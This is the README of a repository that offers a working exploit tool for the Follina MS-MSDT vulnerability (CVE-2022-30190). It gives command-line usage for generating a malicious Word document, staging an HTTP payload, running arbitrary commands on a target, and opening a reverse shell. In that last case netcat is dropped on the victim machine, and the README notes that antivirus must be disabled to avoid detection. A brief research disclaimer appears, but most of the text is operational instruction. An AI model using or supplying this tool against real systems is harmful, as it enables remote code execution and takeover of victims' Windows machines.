Implementation of FOLLINA-CVE-2022-30190

This repository contains an exploitation tool for the vulnerability FOLLINA-CVE-2022-30190

This tool developed for security testing and research purposes. by cloning / forking this tool the origin developer withdraw any responsibilities on the actors actions.

1. read about the CVE-2022-30190 from here
2. prepare your testing environment (I suggest using Virtual Box + Vagrant)

• Download VirtualBox from here
• Download Vagrant form here
• Read about Vagrant CLI from here

Create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server.

usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

Pop calc.exe:

$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

Pop cmd.exe:

$ python3 exploit.py --command "cmd"

Get a reverse shell on port 9001. Note, this downloads a netcat binary onto the victim and places it in C:\Windows\Tasks. It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.

$ python3 exploit.py --reverse 9001